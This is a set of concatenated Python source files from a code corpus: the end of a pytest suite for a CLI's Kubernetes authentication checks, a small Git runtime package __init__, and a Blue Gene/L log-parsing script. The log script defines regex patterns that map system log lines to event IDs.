assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
def test_clirun_auth_works_incluster_with_client(login_mocks, kubernetes,
invoke, preload, real_run):
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_clirun_auth_works_viaconfig_with_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_clirun_auth_fails_on_config_error_in_pykube(login_mocks, any_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.pykube_from_file.side_effect = FileNotFoundError
result = invoke(['run'])
assert result.exit_code != 0
assert 'neither in-cluster, nor via kubeconfig' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
assert not login_mocks.pykube_checker.called
def test_clirun_auth_fails_on_config_error_in_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
login_mocks.client_from_file.side_effect = kubernetes.config.ConfigException
result = invoke(['run'])
assert result.exit_code != 0
assert 'neither in-cluster, nor via kubeconfig' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
assert not login_mocks.client_checker.called
def test_clirun_check_fails_on_tcp_error_in_pykube(login_mocks, any_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_checker.side_effect = requests.exceptions.ConnectionError()
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please configure the cluster access' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_clirun_check_fails_on_401_error_in_pykube(login_mocks, any_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_checker.side_effect = requests.exceptions.HTTPError(response=RESPONSE_401)
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please login or configure the tokens' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_clirun_check_fails_on_tcp_error_in_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.client_checker.side_effect = urllib3.exceptions.HTTPError()
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please configure the cluster access' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_clirun_check_fails_on_401_error_in_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.client_checker.side_effect = kubernetes.client.rest.ApiException(status=401)
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please login or configure the tokens' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called

04ed3f0f96272df9e57f618f45d189ff84b037cf | 177 | py | Python | meg_runtime/git/__init__.py | ibedard16/Runtime | c2901c36c79bbe835fbe9c94e4500d46eea26f01 | ["MIT"] | null | null | null
meg_runtime/git/__init__.py | ibedard16/Runtime | c2901c36c79bbe835fbe9c94e4500d46eea26f01 | ["MIT"] | 5 | 2020-03-24T19:59:38.000Z | 2020-04-22T03:44:43.000Z
meg_runtime/git/__init__.py | ibedard16/Runtime | c2901c36c79bbe835fbe9c94e4500d46eea26f01 | ["MIT"] | 2 | 2020-03-13T18:35:46.000Z | 2020-04-11T20:19:20.000Z

"""Multimedia Extensible Git runtime Git client interfaces"""
from meg_runtime.git.repository import GitRepository, GitException
from meg_runtime.git.manager import GitManager

8e0323aa1acb9799ac8bf01d7712df73acf8b8aa | 92,572 | py | Python | data_generation/bgl2.py | stefanthaler/2017-ecml-forensic-unsupervised | a35a77257e0f571dcc5f272c15e109050c41379b | ["Apache-2.0"] | 2 | 2018-07-27T05:49:40.000Z | 2018-11-27T15:34:21.000Z
data_generation/bgl2.py | stefanthaler/2017-ecml-forensic-unsupervised | a35a77257e0f571dcc5f272c15e109050c41379b | ["Apache-2.0"] | 3 | 2020-09-25T18:53:04.000Z | 2022-02-09T23:27:00.000Z
data_generation/bgl2.py | stefanthaler/2017-ecml-forensic-unsupervised | a35a77257e0f571dcc5f272c15e109050c41379b | ["Apache-2.0"] | 5 | 2017-12-21T13:47:05.000Z | 2020-03-31T12:24:24.000Z

"""
Maps similar events to same id
"""
# imports
import argparse # parse command line ptions
import csv # csv files
import re as re # for regular expressions
import os # copy to clipboard
import numpy as np # calculating dataset statistics
import json # dumping results to file
# copy text to clipboard
import subprocess
def copy2clip(txt):
cmd='echo "'+txt.strip()+'"| xsel --clipboard'
return subprocess.check_call(cmd, shell=True)
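# Note (not in the original script): copy2clip above interpolates txt into a
# shell string, so quotes in txt can break the command. A sketch of a safer
# variant that feeds the text to xsel via stdin instead of the shell:
def copy2clip_stdin(txt):
    return subprocess.run(["xsel", "--clipboard"], input=txt.strip().encode(),
                          check=True).returncode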
"""
Helper pattern
"""
#
hexchar = "[0-9a-fA-F]"
hexcharcol = "[0-9a-fA-F:]"
#
hex_address = "0x%s{8}"%hexchar
ip4address = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
ip4andport = "%s:\d{1,5}"%ip4address
# 1117838570
timestamp = "\d{10}"
# 2005.06.03
date = "20\d{2}?\.\d{2}\.\d{2}"
null_node = "NULL"
unknown_location = "UNKNOWN_LOCATION"
# 2005-06-03-15.42.50.363779
datetime = "20\d{2}?-\d{2}-\d{2}-\d{2}\.\d{2}\.\d{2}\.\d{6}"
# R02-M1-N0-C:J12-U11 | R20-M1-NF-C:J13-U01 | R21-M1-N8-C:J10-U01
nodeid = "R\d{2}-M\d-N\w-\w:J\d{2}-U\d{2}"#|%s|%s)"%(null_node, unknown_location)
# R27-M1-L3-U18-C
# R72-M1-L1-U18-A
nodeid2 = "R\d{2}-M\d-L\d-U\d{2}-\w"#%(null_node, unknown_location)
# R33-M1-ND
nodeid3 = "R\d{2}-M\d-?[NL]?\w?\w?"#"|%s|%s|R\d\d)"%(null_node, unknown_location)
#
rack_id = "R\d{2}"
eight_hex = "%s{8}"%hexchar
# \(unit=0x0b bit=0x17\)
unit_id = "\(unit=0x%s{2} bit=0x%s{2}\)"%(hexchar, hexchar)
# FF:F2:9F:16:E8:42:00:0D:60:E9:17:BD
LP_ADDRESS = "%s{35}"%hexcharcol
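# Illustrative check (not in the original file): the %-interpolated fragments
# above compose into plain regex strings, e.g. ip4andport expands to
# "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}" and matches an ip:port token.
assert re.fullmatch(ip4andport, "10.0.0.59:1024") is not None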
"""
if split_line[3]=="NULL":
node_id = "NULL"
elif split_line[3]=="UNKNOWN_LOCATION":
node_id = "UNKNOWN_LOCATION"
elif re.search(r"R\d{2}-M\d-N\w-\w:J\d{2}-U\d{2}",split_line[3]):
node_id = "NODE_ID_01"
elif re.search(r"R\d{2}-M\d-L\d-U\d{2}-\w",split_line[3]):
node_id = "NODE_ID_02"
elif re.search(r"R\d{2}-M\d-?[NL]?\w?",split_line[3]):
node_id = "NODE_ID_03"
else:
node_id = split_line[3]
"""
# (bit=0x09): Torus/Tree/GI read error 0
machine_check_interupt_torus_read_error = "machine check interrupt \(bit=0x09\): Torus/Tree/GI read error 0"
# Ido chip status changed: FF:F2:9F:16:E7:14:00:0D:60:E9:18:EB ip=10.1.1.75 v=13 t=4 status=M Fri Jun 17 07:25:00 PDT 2005
# Ido chip status changed: FF:F2:9F:16:EB:8B:00:0D:60:E9:14:74 ip=10.0.0.140 v=13 t=4 status=M Mon Nov 14 07:14:42 PST 2005
ido_chipstatus_changed = "Ido chip status changed: %s{35} ip=%s v=\d{1,2} t=\d status=\w .+? 2\d{3}"%(hexcharcol,ip4address)
# BglIdoChip table has 2 IDOs with the same IP address \(10.0.0.237\)
bgl_ido_chip_table = "BglIdoChip table has \d+? IDOs with the same IP address \(%s\)"%(ip4address)
# SerialNumber\(000000000000000000000000fff29f16e842000d60e917bd\) IpAddress\(10.0.0.237\) Status\(A\)
serialnumber_ipaddress = "SerialNumber\(%s{48}\) IpAddress\(%s\) Status\(\w\)"%(hexchar,ip4address)
# core.304
generating_core = "generating core\.\d{1,5}?"
# 1 ddr errors(s) detected and corrected on rank 0, symbol 0, bit 3
ddr_error_detected_on_rank = "\d{1,3}? ddr errors\(s\) detected and corrected on rank 0, symbol \d{1,2}?, bit \d"
# total of 1 ddr error(s) detected and corrected
total_ddr_errors = "total of \d+? ddr error\(s\) detected and corrected"
# 3450051 L3 EDRAM error(s) (dcr 0x0157) detected and corrected
l3_edram_error = "\d{1,10}? L3 EDRAM error\(s\) \(dcr 0x0157\) detected and corrected"
# CE sym 0, at 0x0b8580c0, mask 0x10
ce_sym = "CE sym \d{1,2}?, at 0x%s{8}, mask 0x%s{2}"%(hexchar,hexchar)
# ddr: activating redundant bit steering: rank=0 symbol=0
ddr_redundant_bit_steering = "ddr: activating redundant bit steering: rank=0 symbol=\d{1,2}?"
# ddr: excessive soft failures, consider replacing the card
ddr_excessive_soft_failures = "ddr: excessive soft failures, consider replacing the card"
# ciod: Error loading /p/gb2/stella/RAPTOR/65641/raptor: invalid or missing program image, No such file or directory
invalid_missing_program = "ciod: Error loading .+?: invalid or missing program image, No such file or directory"
# 1347195 double-hummer alignment exceptions
double_hummer_exceptions = "\d{1,10}? double-hummer alignment exceptions"
# ciod: X coordinate 8 exceeds physical dimension 8 at line 17 of node map file /home/fgygi/qb/test/h2o/h2o512/txyz1024.map
ciod_xcoordinate_exceeded = "ciod: [XYTZ] coordinate \d+? exceeds physical dimension \d+? at line \d{1,4} of node map file .+?"
# ciodb exited normally with exit code 0
ciodb_exited_normally = "ciodb exited normally with exit code \d{1,2}"
# ciodb exited abnormally due to signal: Aborted
ciodb_exited_abnormally = "ciodb exited abnormally due to signal: .+?"
# Error receiving packet on tree network, expecting type 57 instead of type 3 (softheader=0064588e 8aff0003 00000002 00000000) PSR0=00001f01 PSR1=00000000 PRXF=00000002 PIXF=00000007
error_receiving_packet_tree = "Error receiving packet on tree network, expecting type \d{1,2} instead of type \d{1,2} \(softheader=.+?\) .+?"
#ciod: Error creating node map from file /home/fgygi/qb/test/h2o/h2o512/txyz1024.map: Cannot allocate memory
ciod_error_creating_node_map = "ciod: Error creating node map from file /.+?: Cannot allocate memory"
# NULL DISCOVERY INFO New ido chip inserted into the database: FF:F2:9F:16:EE:CF:00:0D:60:E9:11:30 ip=10.0.0.59 v=13 t=4
new_ido_chipset_inserted = "NULL DISCOVERY INFO New ido chip inserted into the database: .+? ip=%s v=\d{1,2} t=\d"%(ip4address)
# 1 tree receiver 2 in re-synch state event(s) (dcr 0x019a) detected
tree_receiver_detected = "\d{1,8} tree receiver \d in re-synch state event\(s\) \(dcr 0x%s{4}\) detected.*?"%(hexchar)
# idoproxydb has been started: : DRV142_2005 $ Input parameters: -enableflush -loguserinfo db.properties BlueGene1
ido_proxy_has_been_started = "idoproxydb has been started: \$Name: .+? \$ Input parameters: -enableflush -loguserinfo db\.properties BlueGene1"
# ciodb has been restarted.
ciodb_has_been_restarted = "ciodb has been restarted\."
# mmcs_db_server has been started: ./mmcs_db_server --useDatabase BGL --dbproperties serverdb.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all
# mmcs_db_server has been started: ./mmcs_db_server --useDatabase BGL --dbproperties serverdb.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all --shutdown-timeout 30
# mmcs_db_server has been started: ./mmcs_db_server --useDatabase BGL --dbproperties db.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all
mmcs_db_server_started = "mmcs_db_server has been started: .+?/mmcs_db_server --useDatabase BGL --dbproperties .+?\.properties --iolog /bgl/BlueLight/logs/BGL --reconnect-blocks all.*?"
# ciod: failed to read message prefix on control stream
ciod_failed_control_stream = "ciod: failed to read message prefix on control stream \(CioStream socket to 172\.16\.96\.116\:\d{5}"
# 1 L3 directory error(s) (dcr 0x0152) detected and corrected
l3_directory_errors_detected = "\d+? L3 directory error\(s\) \(dcr 0x0152\) detected and corrected"
# instruction address: 0x0000df30
instruction_address = "instruction address: 0x%s{8}"%hexchar
# machine check status register: 0x81000000
machine_check_status = "[mM]achine [cC]heck [Ss]tatus [Rr]egister: 0x%s{8}"%hexchar
# 1:1fefff30 2:1eeeeeee 3:00000000
general_purpose_registers = "(\d{1,2}:%s{8} ?){3,4}?"%(hexchar)
# lr:003625f0 cr:20000000 xer:00000002 ctr:0037f084
# - 1119454873 2005.06.22 R02-M1-N0-C:J12-U11 2005-06-22-08.41.13.453790 R02-M1-N0-C:J12-U11 RAS KERNEL INFO lr:0047ac04 cr:00000020 xer:20000002 ctr:00000000
special_purpose_registers = "lr:%s{8} cr:%s{8} xer:%s{8} ctr:%s{8}"%(hexchar,hexchar,hexchar,hexchar)
# 17 torus receiver x+ input pipe error(s) (dcr 0x02ec) detected and corrected
torus_reciever_error = "\d{1,10} torus receiver [xyz][\+\-] input pipe error\(s\) \(dcr 0x%s{4}\) detected and corrected.*?"%(hexchar)
# 1 torus sender y- retransmission error(s) (dcr 0x02f7) detected and corrected
torus_sender_corrected = "\d{1,8} torus sender [xyz][\+\-] retransmission error\(s\) \(dcr 0x%s{4}\) detected and corrected"%(hexchar)
# external input interrupt (unit=0x02 bit=0x0b): torus sender y+ retransmission error was corrected
torus_retransmission_corrected = "external input interrupt \(unit=0x%s{2} bit=0x%s{2}\): torus sender [xyz][\+-] retransmission error was corrected"%(hexchar,hexchar)
# Expected 10 active FanModules, but found 9 ( Found J300 J301 J302 J303 J304 J306 J307 J308 J309 ).
expected_x_fanmodules = "Expected \d{1,2} active FanModules, but found \d{1,2} \( Found( .+?)+ \)\."
# data address: 0x4bffffa4
data_address = "data address: 0x%s{8}"%(hexchar)
# ciod: cpu 0 at treeaddr 925 sent unrecognized message 0xffffffff
ciod_unrecognized_message = "ciod: cpu 0 at treeaddr \d{2,5} sent unrecognized message 0xffffffff"
# ciod: for node 42, read continuation request but ioState is 0
ciod_read_continuation = "ciod: for node \d{1,3}, read continuation request but ioState is 0"
# ciod: Message code 2 is not 3 or 4294967295
ciod_message_code = "ciod: Message code \d is not \d{1,2} or 4294967295"
# machine check interrupt (bit=0x1d): L2 dcache unit data parity error
# machine check interrupt (bit=0x10): L2 dcache unit read return parity error
machine_check_interupt_l2 = "machine check interrupt \(bit=0x.+?\): L2 dcache unit data parity error"
machine_check_interupt_l2_cdu = "machine check interrupt \(bit=0x.+?\): L2 DCU read error"
# ciod: LOGIN chdir(/p/gb1/stella/RAPTOR/2183) failed: Input/output error
ciod_login_input_output = "ciod: LOGIN chdir\(/.+?\) failed: Input/output error"
# machine check interrupt \(bit=0x06\): L3 major internal error
machine_check_interupt_l3 = "machine check interrupt \(bit=0x06\): L3 major internal error"
# L3 global control register: 0x001249f0
l3_global_control_register = "L3 global control register: 0x%s{8}"%(hexchar)
# L3 ecc control register: 00000000
l3_ecc_control_register = "L3 ecc control register: %s{8}"%(hexchar)
# L3 ecc status register: 00000000
l3_ecc_status_register = "L3 ecc status register: %s{8}"%(hexchar)
# mmcs_server exited normally with exit code 13
mmcs_server_exited_normally = "mmcs_server exited normally with exit code \d{1,2}"
# HARDWARE WARNING PrepareForService is being done on this card(mLctn(R33-M1-ND), mCardSernum(203231503833343000000000594c31304b35303034303232), mLp(FF:F2:9F:16:BF:44:00:0D:60:E9:40:BB), mIp(10.3.0.80), mType(4)) by root
hardware_warning = "PrepareForService is being done on this card\(mLctn\(%s\), mCardSernum\(%s+?\), mLp\(.+?\), mIp\(%s\), mType\(4\)\) by root"%(nodeid3,hexchar,ip4address)
# HARDWARE WARNING PrepareForService shutting down NodeCard(mLctn(R33-M1-ND), mCardSernum(203231503833343000000000594c31304b35303034303232), mLp(FF:F2:9F:16:BF:44:00:0D:60:E9:40:BB), mIp(10.3.0.80), mType(4)) as part of Service Action 219
hardware_warning_shutdown = "PrepareForService shutting down NodeCard\(mLctn\(%s\), mCardSernum\(%s+?\), mLp\(.+?\), mIp\(%s\), mType\(4\)\) as part of Service Action \d{3}"%(nodeid3,hexchar,ip4address)
# PrepareForService is being done on this part \(mLctn\(R36-M1-NE\), mCardSernum\(203231503833343000000000594c31304b3433343231544b\), mLp\(FF:F2:9F:16:C9:63:00:0D:60:E9:36:9C\), mIp\(10.3.1.147\), mType\(4\)\) by root
prepare_for_service_on_this_part = ("PrepareForService is being done on this part \(mLctn\(%s\), "
"mCardSernum\(.+?\), mLp\(.+?\), mIp\(%s\), "
"mType\(\d\)\) by .*?")%(nodeid3, ip4address)
# PrepareForService is being done on this Midplane (mLctn(R07-M1), mCardSernum( 203937503631353900000000594c31304b34323635303343)) by root
# PrepareForService is being done on this Midplane (mLctn(R07-M1), mCardSernum( 203937503631353900000000594c31304b34323635303343)) by root
prepare_for_service_on_this_midplane = "PrepareForService is being done on this Midplane \(mLctn\(.+?\), mCardSernum\( .+?\)\) by .+?"
# DDR failing info register: 0x8f401000
ddr_failing_info_register = "DDR failing info register: 0x%s{8}"%(hexchar)
# symbol................15
symbol = "symbol................\d{1,2}"
# mask..................0x00
mask = "mask..................0x%s{2}"%(hexchar)
# 1 torus processor sram reception error\(s\) \(dcr 0x02fc\) detected and corrected
torus_sram_repetition = "\d+? torus processor sram reception error\(s\) \(dcr 0x02fc\) detected and corrected"
# ddr: Unable to steer rank=0, symbol=0 - rank is already steering symbol 2. Due to multiple symbols being over the correctable e
ddr_unable_to_steer_rank = "ddr: Unable to steer rank=0, symbol=\d{1,3} - rank is already steering symbol \d{1,3}. Due to multiple symbols being over the correctable? ?e?"
# ddr: Unable to steer rank=0, symbol=5 - rank is already steering symbol 4. Due to multiple symbols being over the correctable error threshold, consider replacing the card
ddr_unable_to_steer_rank_already_steering = "ddr: Unable to steer rank=0, symbol=\d{1,3} - rank is already steering symbol \d{1,3}. Due to multiple symbols being over the correctable error threshold, consider replacing the card"
"""
Logline patterns
"""
# according to https://jiemingzhu.github.io/pub/pjhe_dsn2016.pdf, should have 376 events
KNOWN_LOGLINE_PATTERN = [
r"^(-|LINKDISC) TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {prepare_for_service_on_this_midplane}$".format( prepare_for_service_on_this_midplane=prepare_for_service_on_this_midplane),
r"^(-|MASNORM) TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE {ciodb_exited_normally}$".format(ciodb_exited_normally=ciodb_exited_normally),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_01|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_01|UNKNOWN_LOCATION) NULL DISCOVERY WARNING Problem communicating with link card (ido|iDo machine) with LP of {LP_ADDRESS}, caught java.lang.IllegalStateException: while executing I2C Operation caught java.lang.RuntimeException: Communication error: \(DirectIDo for com.ibm.ido.DirectIDo object \[{LP_ADDRESS}@/{ip4andport} with image version \d+? and card type \d+?\] is in state = COMMUNICATION_ERROR, sequenceNumberIsOk = false, ExpectedSequenceNumber = \d+?, Reply Sequence Number = .+?, timedOut = true, retries = 200, timeout = 1000, Expected Op Command = 2, Actual Op Reply = -1, Expected Sync Command = .+?, Actual Sync Reply = .+?\)$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_01|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_01|UNKNOWN_LOCATION) {new_ido_chipset_inserted}$".format( new_ido_chipset_inserted=new_ido_chipset_inserted),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|NULL) DATE_TIME (NODE_ID_03|NULL) RAS MMCS ERROR idoproxydb hit ASSERT condition: ASSERT expression=.+? Source file=.+? Source line=\d+? Function=.+? .+?::.+?\)$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY ERROR Bad cable going into LinkCard \({hexchar}+?\) Jtag \(\d\) Port \(\w\) - \d+? bad wires".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY ERROR Missing reverse cable: Cable {nodeid3} \d \w \(J\d+?\) --> {nodeid3} \d \w \(J\d+?\) is present BUT the reverse cable {nodeid3} \d \w \(J\d+?\) --> {nodeid3} \d \w \(J\d+?\) is missing".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY INFO Node card VPD check: missing U\d+? node, VPD ecid {hexchar}+? in processor card slot J\d+?$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY (INFO|WARNING) Node card VPD check: U\d+? node in processor card slot J\d+? do not match. VPD ecid {hexchar}+?, found {hexchar}+?$".format(hexchar=hexchar),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY SEVERE Can not get assembly information for node card$",
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY SEVERE Problem communicating with service card, ido chip: {hexcharcol}+?\. java.io.IOException: Could not find EthernetSwitch on port:address \d+?:\d+?$".format(hexcharcol=hexcharcol, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY SEVERE {expected_x_fanmodules}$".format( expected_x_fanmodules=expected_x_fanmodules),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL (DISCOVERY|HARDWARE) (WARNING|SEVERE) (Node card|NodeCard) is not fully functional$",
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY WARNING Problem communicating with service card, ido chip: {hexcharcol}+?\. java.lang.IllegalStateException: IDo is not in functional state -- currently in state COMMUNICATION_ERROR$".format(hexcharcol=hexcharcol),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY WARNING this link card is not fully functional$".format(LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL HARDWARE SEVERE LinkCard is not fully functional$".format( LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL HARDWARE SEVERE LinkCard power module U\d+? is not accessible$".format( LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION|{rack_id}) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION|{rack_id}) NULL HARDWARE WARNING EndServiceAction \d\d\d performed upon {rack_id} by .+?$".format(rack_id=rack_id, ),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|{rack_id}|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|{rack_id}|UNKNOWN_LOCATION) NULL HARDWARE WARNING PrepareForService is being done on this rack \({rack_id}\) by .+?$".format(rack_id=rack_id, ),
r"^- TIME_STAMP SHORT_DATE - DATE_TIME 0 \(.+?\) iar {hex_address}, dear {hex_address} \(.+? RAS KERNEL INFO Kernel.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE - DATE_TIME nput interrupts, 0 microseconds max time in a cr RAS KERNEL INFO .+? total interrupts. .+? critical input interrupts. .+? microseconds total spent on critical input interrupts, .+? microseconds max time in a critical input interrupt.$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE - DATE_TIME RAS KERNEL FATAL Kill job \d\d\d\d\d timed out. Block freed.$",
r"^- TIME_STAMP SHORT_DATE - DATE_TIME time for a single instance of a correctable ddr. RAS KERNEL INFO .+? microseconds spent in the rbs signal handler during .+? calls. .+? microseconds was the maximum time for a single instance of a correctable ddr.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE (NODE_ID_01|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_01|UNKNOWN_LOCATION) NULL HARDWARE WARNING .+?IBM Part Number:.+?Vendor:.+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error creating node map from file .+?: .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error loading .+?: invalid or missing program image, .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error loading .+?: not a CNK program image$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error loading .+?: program image too big, .+? > .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: LOGIN open\(.+?\) failed: Permission denied$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL DCR 0x\w\w\w : {hex_address}$".format(hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL Torus non-recoverable error DCRs follow.$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: LOGIN chdir\(.+?\) failed: .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL [Cc]ore [Cc]onfiguration [Rr]egister.*?: {hex_address}$".format(hex_address=hex_address, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL [Gg]eneral [Pp]urpose [Rr]egisters:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL \d*?, max=\d+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL \d+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL address parity error..0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL auxiliary processor.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL byte ordering exception.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first DDR uncorrectable error address..[01]$",
